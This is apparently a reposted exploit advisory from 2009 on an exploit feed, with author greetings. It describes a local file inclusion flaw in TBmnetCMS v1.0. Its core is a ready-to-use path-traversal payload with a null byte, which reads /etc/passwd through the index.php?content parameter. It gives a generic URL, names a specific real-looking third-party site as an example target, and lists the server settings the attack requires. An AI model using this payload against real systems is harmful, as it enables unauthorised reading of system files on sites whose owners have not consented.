|
Feeds -
Exploits
|
|
Written by d3v1l
|
|
Saturday, 28 February 2009 15:31 |
[~]------------------------------------------------------------------------ [~] TBmnetCMS v1.0 (index.php?content) Local File Inclusion Vulnerability
[~]
[~] http://www.tbmnet.de
[~]
[~]
[~]
---------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 3.11.2008
[~]
[~]
[~]
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
http://security-sh3ll.com
[~]
[~]
--------------------------------------------------------------------------- [~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] milw0rm staff
[~] ------------------------------------------------------------------------ [~] Exploit :-
[~]
[~]
http://site.com/index.php?content=../../../../../../../../../../../../../..
/etc/passwd%00
[~]
[~] Ex :-
[~]
http://www.valtellinux.it/meeting/index.php?content=../../../../../../../..
/../../../../../../etc/passwd%00
[~] ------------------------------------------------------------------------
[~] NEED:- magic_quotes=OFF
[~]
[~] NEED:- disable_functions=ini_set
[~] ------------------------------------------------------------------------
|